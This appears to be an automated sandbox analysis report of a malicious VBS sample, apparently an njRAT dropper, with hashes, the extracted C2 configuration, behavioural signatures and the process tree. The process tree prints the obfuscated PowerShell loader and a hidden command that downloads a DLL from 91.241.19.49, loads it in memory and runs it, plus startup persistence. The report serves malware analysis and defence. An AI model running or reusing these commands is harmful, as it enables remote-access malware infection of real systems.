Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
11/08/2022, 18:00
Static task
static1
Behavioral task
behavioral1
Sample
6e4b16840770fe3b078206831254d138.vbs
Resource
win7-20220718-en
General
-
Target
6e4b16840770fe3b078206831254d138.vbs
-
Size
204KB
-
MD5
6e4b16840770fe3b078206831254d138
-
SHA1
12da33c6224a67811698b2b6c8fb771357a43638
-
SHA256
7d725947a2cc12a85a532d67444856f521749057a8263a10880634642c2276eb
-
SHA512
a318aaabe1c9f226d2abaf1556a6693d364676e123e7572a7c95ee44b3f28e1c59f8d7d8a6c203a6e05e0de0f6f0394d6b7c52e8851d2f171880f179a9cdba37
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Extracted
njrat
0.7NC
NYAN CAT
wibnj.duckdns.org:57831
549d524552
-
reg_key
549d524552
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 4064 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yu7y6%$!#$%&\()=.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4064 set thread context of 1208 4064 powershell.exe 83 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2300 powershell.exe 2300 powershell.exe 4064 powershell.exe 4064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe Token: 33 1208 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1208 RegSvcs.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4372 wrote to memory of 2300 4372 WScript.exe 80 PID 4372 wrote to memory of 2300 4372 WScript.exe 80 PID 2300 wrote to memory of 4064 2300 powershell.exe 82 PID 2300 wrote to memory of 4064 2300 powershell.exe 82 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83 PID 4064 wrote to memory of 1208 4064 powershell.exe 83
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC8AeQB1ADcAeQA2AC⌚⌚⌚AJAAhACIAIwAkAC⌚⌚⌚AJgAvACgAKQA9ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '/yu7y6%$!"#$%&/()=' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693